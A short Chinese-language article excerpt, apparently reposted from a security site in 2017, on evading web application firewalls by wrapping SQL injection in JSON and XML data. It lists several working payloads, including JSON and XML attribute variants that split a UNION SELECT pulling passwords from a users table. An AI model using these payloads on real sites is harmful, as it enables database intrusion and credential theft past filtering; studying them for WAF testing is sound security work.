本文讲的是
看我如何使用数据格式混淆来绕过WAF进行攻击?,
这个问题目前是没有成功解决,因为解析相关数据类型需要进行准确的流量分析。很多防火墙只是采用了一些很简单的方法对这些数据进行处理。在处理HTTP协议中,常见简单方法如下:
1. 使用Content-Type HTTP标头进行检查 2. 使用最适合的数据类型 3. 手动配置每一个数据的数据类型。
?jdata={"json":"here"}
?injection={"'union/*":"*/select", ",2,password, ":" FROM users;#"}
' UNION SELECT 1,2,password,4 FROM users--a-
<?xml version="1.0"?><a att1="'union/*" att2="*/select" att3=",username," att4=" FROM user;#">I'm an XML. Trust me!</a>
原文发布时间为:2017年6月2日
本文作者:xnianq
本文来自云栖社区合作伙伴嘶吼,了解相关信息可以关注嘶吼网站。